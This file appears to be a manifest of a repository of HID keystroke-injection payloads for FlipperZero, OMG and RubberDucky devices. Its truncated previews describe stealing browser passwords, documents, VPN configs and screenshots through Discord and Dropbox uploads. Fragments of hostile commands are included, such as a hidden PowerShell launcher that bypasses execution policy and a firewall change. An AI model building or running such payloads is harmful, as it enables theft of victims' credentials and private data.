"path": "FlipperZero/payloads/Copy-And-Waste/c.ps1",
"chars": 965,
"preview": "Add-Type -AssemblyName WindowsBase\r\nAdd-Type -AssemblyName PresentationCore\r\n\r\nfunction dischat {\r\n\r\n [CmdletBinding()"
},
{
"path": "FlipperZero/payloads/Copy-And-Waste/payload.txt",
"chars": 807,
"preview": "REM Title: Copy-And-Waste\r\nREM Author: atomiczsec & I am Jakoby\r\nREM Description: This payload is meant to e"
},
{
"path": "FlipperZero/payloads/Copy-And-Waste/placeholder",
"chars": 1,
"preview": "\n"
},
{
"path": "FlipperZero/payloads/De-Bloater/README.md",
"chars": 2798,
"preview": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/watermark.png?raw=true\" width=\"200\">\n\n<h1 align=\"ce"
},
{
"path": "FlipperZero/payloads/De-Bloater/placeholder",
"chars": 1,
"preview": "\n"
},
{
"path": "FlipperZero/payloads/Doc-Hog/d.ps1",
"chars": 1311,
"preview": "function Doc-Hog {\n [CmdletBinding()]\n param (\n [parameter(Position=0,Mandatory=$False)]\n [string]$"
},
{
"path": "FlipperZero/payloads/Doc-Hog/payload.txt",
"chars": 556,
"preview": "REM Title: Doc-Hog\r\nREM Author: atomiczsec\r\nREM Description: This payload will enumerate through the files. "
},
{
"path": "FlipperZero/payloads/Doc-Hog/readme.md",
"chars": 2211,
"preview": "\r\n<h1 align=\"center\">\r\n <a href=\"https://git.io/typing-svg\">\r\n <img src=\"https://readme-typing-svg.herokuapp.com/?li"
},
{
"path": "FlipperZero/payloads/History-Pig/HP.ps1",
"chars": 2509,
"preview": "#History-Pig\r\n\r\n# See if file is a thing\r\nTest-Path -Path \"$env:USERPROFILE\\AppData\\Local\\Google\\Chrome\\User Data\\Defaul"
},
{
"path": "FlipperZero/payloads/History-Pig/README.md",
"chars": 2931,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "FlipperZero/payloads/History-Pig/payload.txt",
"chars": 553,
"preview": "REM Title: History-Pig\r\nREM Author: atomiczsec\r\nREM Description: This payload is meant to exfiltrate browser"
},
{
"path": "FlipperZero/payloads/OVPN-Hog/o.ps1",
"chars": 1138,
"preview": "function OVPN-Hog {\n [CmdletBinding()]\n param (\n [parameter(Position=0,Mandatory=$False)]\n [string]"
},
{
"path": "FlipperZero/payloads/OVPN-Hog/payload.txt",
"chars": 581,
"preview": "REM Title: Doc-Hog\r\nREM Author: atomiczsec\r\nREM Description: This payload will enumerate through the files l"
},
{
"path": "FlipperZero/payloads/OVPN-Hog/readme.md",
"chars": 2338,
"preview": "<h1 align=\"center\">\r\n <a href=\"https://git.io/typing-svg\">\r\n <img src=\"https://readme-typing-svg.herokuapp.com/?line"
},
{
"path": "FlipperZero/payloads/Powershell-History/PH.ps1",
"chars": 1801,
"preview": "#Powershell-History\r\n\r\n# See if file is a thing\r\nTest-Path -Path \"$env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\C"
},
{
"path": "FlipperZero/payloads/Powershell-History/README.md",
"chars": 2967,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "FlipperZero/payloads/Powershell-History/payload.txt",
"chars": 606,
"preview": "REM Title: Powershell-History\r\nREM Author: atomiczsec\r\nREM Description: This payload is meant to exfiltrate "
},
{
"path": "FlipperZero/payloads/Printer-Recon/PR.ps1",
"chars": 1391,
"preview": "function DropBox-Upload {\n\n[CmdletBinding()]\nparam (\n\t\n[Parameter (Mandatory = $True, ValueFromPipeline = $True)]\n[Alia"
},
{
"path": "FlipperZero/payloads/Printer-Recon/README.md",
"chars": 2812,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "FlipperZero/payloads/Printer-Recon/payload.txt",
"chars": 658,
"preview": "REM Title: Printer-Recon\r\nREM Author: atomiczsec\r\nREM Description: This payload is meant to exfiltrate print"
},
{
"path": "FlipperZero/payloads/Priv-Paths/README.md",
"chars": 2761,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "FlipperZero/payloads/Priv-Paths/payload.txt",
"chars": 795,
"preview": "REM Title: Priv-Paths\r\nREM Author: atomiczsec\r\nREM Description: A payload to enumerate unqouted service path"
},
{
"path": "FlipperZero/payloads/Proton-Hog/README.md",
"chars": 2944,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "FlipperZero/payloads/Proton-Hog/payload.txt",
"chars": 603,
"preview": "REM Title: Proton-Hog\r\nREM Author: atomiczsec\r\nREM Description: A payload to exfiltrate the user config file"
},
{
"path": "FlipperZero/payloads/Proton-Hog/s.ps1",
"chars": 1490,
"preview": "function DropBox-Upload {\r\n\r\n [CmdletBinding()]\r\n param (\r\n \r\n [Parameter (Mandatory = $True, ValueFromP"
},
{
"path": "FlipperZero/payloads/Pwn-Drive/README.md",
"chars": 2869,
"preview": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/lock.png\" width=\"200\">\n\n<h1 align=\"center\">\n <a hr"
},
{
"path": "FlipperZero/payloads/Pwn-Drive/c.ps1",
"chars": 614,
"preview": "#Pwn-Drive\r\n\r\n#Enable Network Discovery\r\nnetsh advfirewall firewall set rule group=”network discovery” new enable=yes\r\n"
},
{
"path": "FlipperZero/payloads/Pwn-Drive/payload.txt",
"chars": 583,
"preview": "REM Title: Pwn-Drive\r\nREM Author: atomiczsec\r\nREM Description: This payload will share the entire victims \"C"
},
{
"path": "FlipperZero/payloads/RanFunWare/README.md",
"chars": 2914,
"preview": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/WannaCry.png\" width=\"200\">\n\n<h1 align=\"center\">\n <"
},
{
"path": "FlipperZero/payloads/RanFunWare/payload.txt",
"chars": 569,
"preview": "REM Title: RanFunWare\r\nREM Author: atomiczsec\r\nREM Description: This payload will prank your target into thi"
},
{
"path": "FlipperZero/payloads/RanFunWare/r.ps1",
"chars": 1875,
"preview": "#Hides Desktop Icons\r\n$Path=\"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\"\r\nSet-ItemProperty -Path "
},
{
"path": "FlipperZero/payloads/Screen-Shock/I.bat",
"chars": 136,
"preview": "@echo off\r\npowershell -Command \"& {cd \"$env:userprofile\\AppData\\Roaming\"; powershell -w h -NoP -NonI -Ep Bypass -File \"c"
},
{
"path": "FlipperZero/payloads/Screen-Shock/README.md",
"chars": 3495,
"preview": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/screen.png\" width=\"200\">\n\n<h1 align=\"center\">\n <a "
},
{
"path": "FlipperZero/payloads/Screen-Shock/c.ps1",
"chars": 1828,
"preview": "function DropBox-Upload {\r\n\r\n[CmdletBinding()]\r\nparam (\r\n \r\n[Parameter (Mandatory = $True, ValueFromPipeline = $True"
},
{
"path": "FlipperZero/payloads/Screen-Shock/payload.txt",
"chars": 829,
"preview": "REM Title: Screen-Shock\r\nREM Author: atomiczsec\r\nREM Description: This payload is meant to exfiltrate screen"
},
{
"path": "FlipperZero/payloads/Screen-Shock/placeholder",
"chars": 1,
"preview": "\n"
},
{
"path": "FlipperZero/payloads/Spotify-Spy/README.md",
"chars": 3024,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "FlipperZero/payloads/Spotify-Spy/SS.ps1",
"chars": 1441,
"preview": "#Spotify-Spy\r\n\r\n# See if file is a thing\r\nTest-Path -Path \"$env:APPDATA\\Spotify\\Users\"\r\n\r\n#Create varible for file name\r"
},
{
"path": "FlipperZero/payloads/Spotify-Spy/payload.txt",
"chars": 650,
"preview": "REM Title: Spotify-Spy\r\nREM Author: atomiczsec\r\nREM Description: This payload is meant to exfiltrate spotify"
},
{
"path": "FlipperZero/payloads/Water-UnMark/README.md",
"chars": 2798,
"preview": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/watermark.png?raw=true\" width=\"200\">\n\n<h1 align=\"ce"
},
{
"path": "FlipperZero/payloads/Water-UnMark/payload.txt",
"chars": 534,
"preview": "REM Title: Water-UnMark\r\nREM Author: atomiczsec\r\nREM Target OS: Windows 10\r\nREM Description: This script w"
},
{
"path": "FlipperZero/payloads/Water-UnMark/placeholder",
"chars": 1,
"preview": "\n"
},
{
"path": "FlipperZero/payloads/cApS-Troll/README.md",
"chars": 2997,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "FlipperZero/payloads/cApS-Troll/a.ps1",
"chars": 501,
"preview": "while (1){\r\nStart-Sleep -Second 45\r\n$wsh = New-Object -ComObject WScript.Shell\r\n$wsh.SendKeys('{CAPSLOCK}')\r\nStart-Sleep"
},
{
"path": "FlipperZero/payloads/cApS-Troll/payload.txt",
"chars": 557,
"preview": "REM Title: cApS-Troll\r\nREM Author: atomiczsec\r\nREM Description: This payload is meant to prank your victim w"
},
{
"path": "Functions/placeholder",
"chars": 1,
"preview": "\n"
},
{
"path": "Functions/tidal-log.ps1",
"chars": 709,
"preview": "# Define the Discord webhook URL\n$webhookUrl = \"https://discord.com/api/webhooks/XXXXXXX\"\n\n# Define the path to the app"
},
{
"path": "OMG/payloads/Bookmark-Hog/BH.ps1",
"chars": 2478,
"preview": "#Bookmark-Hog\r\n\r\n# See if file is a thing\r\nTest-Path -Path \"$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Defau"
},
{
"path": "OMG/payloads/Bookmark-Hog/README.md",
"chars": 3036,
"preview": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/bm-hog.png?\" width=\"200\">\n\n<h1 align=\"center\">\n <a"
},
{
"path": "OMG/payloads/Bookmark-Hog/payload.txt",
"chars": 564,
"preview": "REM Title: Bookmark-Hog\r\n\r\nREM Author: atomiczsec\r\n\r\nREM Description: This payload is meant to exfiltrate bo"
},
{
"path": "OMG/payloads/Bookmark-Hog/placeholder",
"chars": 1,
"preview": "\n"
},
{
"path": "OMG/payloads/Browser-Grab/README.md",
"chars": 3076,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "OMG/payloads/Browser-Grab/b.ps1",
"chars": 1095,
"preview": "function Upload-Discord {\n\n[CmdletBinding()]\nparam (\n [parameter(Position=0,Mandatory=$False)]\n [string]$file,\n "
},
{
"path": "OMG/payloads/Browser-Grab/payload.txt",
"chars": 586,
"preview": "REM Title: Browser-Grab\nREM Author: atomiczsec\nREM Description: A payload to exfiltrate bookmarks, passwords"
},
{
"path": "OMG/payloads/Copy-And-Waste/I.bat",
"chars": 136,
"preview": "@echo off\r\npowershell -Command \"& {cd \"$env:userprofile\\AppData\\Roaming\"; powershell -w h -NoP -NonI -Ep Bypass -File \"c"
},
{
"path": "OMG/payloads/Copy-And-Waste/README.md",
"chars": 3544,
"preview": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/caw.png\" width=\"200\">\n\n<h1 align=\"center\">\n <a hre"
},
{
"path": "OMG/payloads/Copy-And-Waste/c.ps1",
"chars": 965,
"preview": "Add-Type -AssemblyName WindowsBase\r\nAdd-Type -AssemblyName PresentationCore\r\n\r\nfunction dischat {\r\n\r\n [CmdletBinding()"
},
{
"path": "OMG/payloads/Copy-And-Waste/payload.txt",
"chars": 809,
"preview": "REM Title: Copy-And-Waste\r\n\r\nREM Author: atomiczsec & I am Jakoby\r\n\r\nREM Description: This payload is meant "
},
{
"path": "OMG/payloads/Copy-And-Waste/placeholder",
"chars": 1,
"preview": "\n"
},
{
"path": "OMG/payloads/De-Bloater/README.md",
"chars": 2950,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "OMG/payloads/Doc-Hog/d.ps1",
"chars": 1311,
"preview": "function Doc-Hog {\n [CmdletBinding()]\n param (\n [parameter(Position=0,Mandatory=$False)]\n [string]$"
},
{
"path": "OMG/payloads/Doc-Hog/payload.txt",
"chars": 597,
"preview": "REM Title: Doc-Hog\r\nREM Author: atomiczsec\r\nREM Description: This payload will enumerate through the files. "
},
{
"path": "OMG/payloads/Doc-Hog/readme.md",
"chars": 2211,
"preview": "\r\n<h1 align=\"center\">\r\n <a href=\"https://git.io/typing-svg\">\r\n <img src=\"https://readme-typing-svg.herokuapp.com/?li"
},
{
"path": "OMG/payloads/History-Pig/HP.ps1",
"chars": 2509,
"preview": "#History-Pig\r\n\r\n# See if file is a thing\r\nTest-Path -Path \"$env:USERPROFILE\\AppData\\Local\\Google\\Chrome\\User Data\\Defaul"
},
{
"path": "OMG/payloads/History-Pig/README.md",
"chars": 2931,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "OMG/payloads/History-Pig/payload.txt",
"chars": 563,
"preview": "REM Title: History-Pig\r\n\r\nREM Author: atomiczsec\r\n\r\nREM Description: This payload is meant to exfiltrate bro"
},
{
"path": "OMG/payloads/OVPN-Hog/o.ps1",
"chars": 1138,
"preview": "function OVPN-Hog {\n [CmdletBinding()]\n param (\n [parameter(Position=0,Mandatory=$False)]\n [string]"
},
{
"path": "OMG/payloads/OVPN-Hog/payload.txt",
"chars": 623,
"preview": "REM Title: Doc-Hog\r\nREM Author: atomiczsec\r\nREM Description: This payload will enumerate through the files l"
},
{
"path": "OMG/payloads/OVPN-Hog/readme.md",
"chars": 2338,
"preview": "<h1 align=\"center\">\r\n <a href=\"https://git.io/typing-svg\">\r\n <img src=\"https://readme-typing-svg.herokuapp.com/?line"
},
{
"path": "OMG/payloads/Powershell-History/PH.ps1",
"chars": 1801,
"preview": "#Powershell-History\r\n\r\n# See if file is a thing\r\nTest-Path -Path \"$env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\C"
},
{
"path": "OMG/payloads/Powershell-History/README.md",
"chars": 2967,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "OMG/payloads/Powershell-History/payload.txt",
"chars": 616,
"preview": "REM Title: Powershell-History\r\n\r\nREM Author: atomiczsec\r\n\r\nREM Description: This payload is meant to exfiltr"
},
{
"path": "OMG/payloads/Printer-Recon/PR.ps1",
"chars": 1391,
"preview": "function DropBox-Upload {\n\n[CmdletBinding()]\nparam (\n\t\n[Parameter (Mandatory = $True, ValueFromPipeline = $True)]\n[Alia"
},
{
"path": "OMG/payloads/Printer-Recon/README.md",
"chars": 2812,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "OMG/payloads/Printer-Recon/payload.txt",
"chars": 668,
"preview": "REM Title: Printer-Recon\r\n\r\nREM Author: atomiczsec\r\n\r\nREM Description: This payload is meant to exfiltrate p"
},
{
"path": "OMG/payloads/Priv-Paths/README.md",
"chars": 2761,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "OMG/payloads/Priv-Paths/payload.txt",
"chars": 673,
"preview": "REM Title: Priv-Paths\r\nREM Author: atomiczsec\r\nREM Description: A payload to enumerate unqouted service path"
},
{
"path": "OMG/payloads/Proton-Hog/README.md",
"chars": 2944,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "OMG/payloads/Proton-Hog/payload.txt",
"chars": 613,
"preview": "REM Title: Proton-Hog\r\n\r\nREM Author: atomiczsec\r\n\r\nREM Description: A payload to exfiltrate the user config "
},
{
"path": "OMG/payloads/Proton-Hog/s.ps1",
"chars": 1490,
"preview": "function DropBox-Upload {\r\n\r\n [CmdletBinding()]\r\n param (\r\n \r\n [Parameter (Mandatory = $True, ValueFromP"
},
{
"path": "OMG/payloads/Pwn-Drive/README.md",
"chars": 2869,
"preview": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/lock.png\" width=\"200\">\n\n<h1 align=\"center\">\n <a hr"
},
{
"path": "OMG/payloads/Pwn-Drive/c.ps1",
"chars": 614,
"preview": "#Pwn-Drive\r\n\r\n#Enable Network Discovery\r\nnetsh advfirewall firewall set rule group=”network discovery” new enable=yes\r\n"
},
{
"path": "OMG/payloads/Pwn-Drive/payload.txt",
"chars": 593,
"preview": "REM Title: Pwn-Drive\r\n\r\nREM Author: atomiczsec\r\n\r\nREM Description: This payload will share the entire victim"
},
{
"path": "OMG/payloads/RanFunWare/README.md",
"chars": 2914,
"preview": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/WannaCry.png\" width=\"200\">\n\n<h1 align=\"center\">\n <"
},
{
"path": "OMG/payloads/RanFunWare/payload.txt",
"chars": 579,
"preview": "REM Title: RanFunWare\r\n\r\nREM Author: atomiczsec\r\n\r\nREM Description: This payload will prank your target into"
},
{
"path": "OMG/payloads/RanFunWare/r.ps1",
"chars": 1875,
"preview": "#Hides Desktop Icons\r\n$Path=\"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\"\r\nSet-ItemProperty -Path "
},
{
"path": "OMG/payloads/Screen-Shock/I.bat",
"chars": 136,
"preview": "@echo off\r\npowershell -Command \"& {cd \"$env:userprofile\\AppData\\Roaming\"; powershell -w h -NoP -NonI -Ep Bypass -File \"c"
},
{
"path": "OMG/payloads/Screen-Shock/README.md",
"chars": 3495,
"preview": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/screen.png\" width=\"200\">\n\n<h1 align=\"center\">\n <a "
},
{
"path": "OMG/payloads/Screen-Shock/c.ps1",
"chars": 1828,
"preview": "function DropBox-Upload {\r\n\r\n[CmdletBinding()]\r\nparam (\r\n \r\n[Parameter (Mandatory = $True, ValueFromPipeline = $True"
},
{
"path": "OMG/payloads/Screen-Shock/payload.txt",
"chars": 839,
"preview": "REM Title: Screen-Shock\r\n\r\nREM Author: atomiczsec\r\n\r\nREM Description: This payload is meant to exfiltrate sc"
},
{
"path": "OMG/payloads/Screen-Shock/placeholder",
"chars": 1,
"preview": "\n"
},
{
"path": "OMG/payloads/Spotify-Spy/README.md",
"chars": 3024,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "OMG/payloads/Spotify-Spy/SS.ps1",
"chars": 1441,
"preview": "#Spotify-Spy\r\n\r\n# See if file is a thing\r\nTest-Path -Path \"$env:APPDATA\\Spotify\\Users\"\r\n\r\n#Create varible for file name\r"
},
{
"path": "OMG/payloads/Spotify-Spy/payload.txt",
"chars": 660,
"preview": "REM Title: Spotify-Spy\r\n\r\nREM Author: atomiczsec\r\n\r\nREM Description: This payload is meant to exfiltrate spo"
},
{
"path": "OMG/payloads/Water-UnMark/README.md",
"chars": 2798,
"preview": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/watermark.png?raw=true\" width=\"200\">\n\n<h1 align=\"ce"
},
{
"path": "OMG/payloads/Water-UnMark/payload.txt",
"chars": 536,
"preview": "REM Title: Water-UnMark\r\nREM Author: atomiczsec\r\nREM Target OS: Windows 10\r\nREM Description: This script w"
},
{
"path": "OMG/payloads/Water-UnMark/placeholder",
"chars": 1,
"preview": "\n"
},
{
"path": "OMG/payloads/cApS-Troll/README.md",
"chars": 2997,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "OMG/payloads/cApS-Troll/a.ps1",
"chars": 501,
"preview": "while (1){\r\nStart-Sleep -Second 45\r\n$wsh = New-Object -ComObject WScript.Shell\r\n$wsh.SendKeys('{CAPSLOCK}')\r\nStart-Sleep"
},
{
"path": "OMG/payloads/cApS-Troll/payload.txt",
"chars": 569,
"preview": "REM Title: cApS-Troll\r\n\r\nREM Author: atomiczsec\r\n\r\nREM Description: This payload is meant to prank your vict"
},
{
"path": "OMG/payloads/placeholder",
"chars": 1,
"preview": "\n"
},
{
"path": "README.md",
"chars": 1627,
"preview": "# Hak5 & FlipperZero HID Attack Payloads & Functions\n\n\nThis repository contains payloads designed for various hardware h"
},
{
"path": "RubberDucky/payloads/Bookmark-Hog/BH.ps1",
"chars": 2478,
"preview": "#Bookmark-Hog\r\n\r\n# See if file is a thing\r\nTest-Path -Path \"$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Defau"
},
{
"path": "RubberDucky/payloads/Bookmark-Hog/README.md",
"chars": 3036,
"preview": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/bm-hog.png?\" width=\"200\">\n\n<h1 align=\"center\">\n <a"
},
{
"path": "RubberDucky/payloads/Bookmark-Hog/payload.txt",
"chars": 564,
"preview": "REM Title: Bookmark-Hog\r\n\r\nREM Author: atomiczsec\r\n\r\nREM Description: This payload is meant to exfiltrate bo"
},
{
"path": "RubberDucky/payloads/Browser-Grab/README.md",
"chars": 3196,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "RubberDucky/payloads/Browser-Grab/b.ps1",
"chars": 1095,
"preview": "function Upload-Discord {\n\n[CmdletBinding()]\nparam (\n [parameter(Position=0,Mandatory=$False)]\n [string]$file,\n "
},
{
"path": "RubberDucky/payloads/Browser-Grab/payload.txt",
"chars": 578,
"preview": "REM Title: Browser-Grab\nREM Author: atomiczsec\nREM Description: A payload to exfiltrate bookmarks, passwords"
},
{
"path": "RubberDucky/payloads/Copy-And-Waste/I.bat",
"chars": 136,
"preview": "@echo off\r\npowershell -Command \"& {cd \"$env:userprofile\\AppData\\Roaming\"; powershell -w h -NoP -NonI -Ep Bypass -File \"c"
},
{
"path": "RubberDucky/payloads/Copy-And-Waste/README.md",
"chars": 3544,
"preview": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/caw.png\" width=\"200\">\n\n<h1 align=\"center\">\n <a hre"
},
{
"path": "RubberDucky/payloads/Copy-And-Waste/c.ps1",
"chars": 965,
"preview": "Add-Type -AssemblyName WindowsBase\r\nAdd-Type -AssemblyName PresentationCore\r\n\r\nfunction dischat {\r\n\r\n [CmdletBinding()"
},
{
"path": "RubberDucky/payloads/Copy-And-Waste/payload.txt",
"chars": 809,
"preview": "REM Title: Copy-And-Waste\r\n\r\nREM Author: atomiczsec & I am Jakoby\r\n\r\nREM Description: This payload is meant "
},
{
"path": "RubberDucky/payloads/Copy-And-Waste/placeholder",
"chars": 1,
"preview": "\n"
},
{
"path": "RubberDucky/payloads/De-Bloater/README.md",
"chars": 2952,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "RubberDucky/payloads/Doc-Hog/d.ps1",
"chars": 1311,
"preview": "function Doc-Hog {\n [CmdletBinding()]\n param (\n [parameter(Position=0,Mandatory=$False)]\n [string]$"
},
{
"path": "RubberDucky/payloads/Doc-Hog/payload.txt",
"chars": 597,
"preview": "REM Title: Doc-Hog\r\nREM Author: atomiczsec\r\nREM Description: This payload will enumerate through the files. "
},
{
"path": "RubberDucky/payloads/Doc-Hog/readme.md",
"chars": 2211,
"preview": "\r\n<h1 align=\"center\">\r\n <a href=\"https://git.io/typing-svg\">\r\n <img src=\"https://readme-typing-svg.herokuapp.com/?li"
},
{
"path": "RubberDucky/payloads/History-Pig/HP.ps1",
"chars": 2509,
"preview": "#History-Pig\r\n\r\n# See if file is a thing\r\nTest-Path -Path \"$env:USERPROFILE\\AppData\\Local\\Google\\Chrome\\User Data\\Defaul"
},
{
"path": "RubberDucky/payloads/History-Pig/README.md",
"chars": 2931,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "RubberDucky/payloads/History-Pig/payload.txt",
"chars": 563,
"preview": "REM Title: History-Pig\r\n\r\nREM Author: atomiczsec\r\n\r\nREM Description: This payload is meant to exfiltrate bro"
},
{
"path": "RubberDucky/payloads/OVPN-Hog/o.ps1",
"chars": 1138,
"preview": "function OVPN-Hog {\n [CmdletBinding()]\n param (\n [parameter(Position=0,Mandatory=$False)]\n [string]"
},
{
"path": "RubberDucky/payloads/OVPN-Hog/payload.txt",
"chars": 623,
"preview": "REM Title: Doc-Hog\r\nREM Author: atomiczsec\r\nREM Description: This payload will enumerate through the files l"
},
{
"path": "RubberDucky/payloads/OVPN-Hog/readme.md",
"chars": 2338,
"preview": "<h1 align=\"center\">\r\n <a href=\"https://git.io/typing-svg\">\r\n <img src=\"https://readme-typing-svg.herokuapp.com/?line"
},
{
"path": "RubberDucky/payloads/Picture-Hog/p.ps1",
"chars": 1015,
"preview": "function Upload-Discord {\r\n\r\n[CmdletBinding()]\r\nparam (\r\n [parameter(Position=0,Mandatory=$False)]\r\n [string]$fil"
},
{
"path": "RubberDucky/payloads/Picture-Hog/placeholder",
"chars": 1,
"preview": "\n"
},
{
"path": "RubberDucky/payloads/Powershell-History/PH.ps1",
"chars": 1801,
"preview": "#Powershell-History\r\n\r\n# See if file is a thing\r\nTest-Path -Path \"$env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\C"
},
{
"path": "RubberDucky/payloads/Powershell-History/README.md",
"chars": 2967,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "RubberDucky/payloads/Powershell-History/payload.txt",
"chars": 616,
"preview": "REM Title: Powershell-History\r\n\r\nREM Author: atomiczsec\r\n\r\nREM Description: This payload is meant to exfiltr"
},
{
"path": "RubberDucky/payloads/Printer-Recon/PR.ps1",
"chars": 1391,
"preview": "function DropBox-Upload {\n\n[CmdletBinding()]\nparam (\n\t\n[Parameter (Mandatory = $True, ValueFromPipeline = $True)]\n[Alia"
},
{
"path": "RubberDucky/payloads/Printer-Recon/README.md",
"chars": 2812,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "RubberDucky/payloads/Printer-Recon/payload.txt",
"chars": 697,
"preview": "REM Title: Printer-Recon\r\n\r\nREM Author: atomiczsec\r\n\r\nREM Description: This payload is meant to exfiltrate p"
},
{
"path": "RubberDucky/payloads/Priv-Paths/README.md",
"chars": 2758,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "RubberDucky/payloads/Priv-Paths/payload.txt",
"chars": 813,
"preview": "REM Title: Priv-Paths\r\nREM Author: atomiczsec\r\nREM Description: A payload to enumerate unqouted service path"
},
{
"path": "RubberDucky/payloads/Proton-Hog/README.md",
"chars": 2944,
"preview": "<h1 align=\"center\">\n <a href=\"https://git.io/typing-svg\">\n <img src=\"https://readme-typing-svg.herokuapp.com/?lines="
},
{
"path": "RubberDucky/payloads/Proton-Hog/payload.txt",
"chars": 640,
"preview": "REM Title: Proton-Hog\r\n\r\nREM Author: atomiczsec\r\n\r\nREM Description: A payload to exfiltrate the user config "
},
{
"path": "RubberDucky/payloads/Proton-Hog/s.ps1",
"chars": 1490,
"preview": "function DropBox-Upload {\r\n\r\n [CmdletBinding()]\r\n param (\r\n \r\n [Parameter (Mandatory = $True, ValueFromP"
},
{
"path": "RubberDucky/payloads/Pwn-Drive/README.md",
"chars": 2870,
"preview": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/lock.png\" width=\"200\">\n\n<h1 align=\"center\">\n <a hr"
}
]
// ... and 24 more files (download for full content)